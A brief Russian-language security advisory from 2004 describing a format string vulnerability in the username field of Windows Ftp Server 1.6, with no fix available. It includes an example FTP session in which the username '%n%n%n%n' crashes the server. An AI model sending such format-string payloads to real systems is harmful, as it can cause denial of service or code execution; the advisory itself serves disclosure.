Security Lab

Удаленное выполнение произволного кода в Windows Ftp Server

Дата публикации:13.01.2004
Дата изменения:16.10.2006
Всего просмотров:1317
Опасность:
Высокая
Наличие исправления: Нет
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Отказ в обслуживании
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Windows Ftp Server 1.x
Уязвимые версии: Windows Ftp Server 1.6

Описание: Уязвимость форматной строки обнаружена в Windows Ftp Server. Удаленный пользователь может выполнить произвольный код на целевой системе.

Сервер не определяет форматную строку при обработке данных, представленных пользователем в поле 'username'.

Пример/Эксплоит:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ftp 127.0.0.1
Connected to 127.0.0.1.
220 Welcome to Windows FTP Server
User (127.0.0.1:(none)): %n%n%n%n
Connection closed by remote host.

C:\WINDOWS\system32>

URL производителя:http://srv.nease.net/index.htm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Windows FTP Server Format String Vulnerability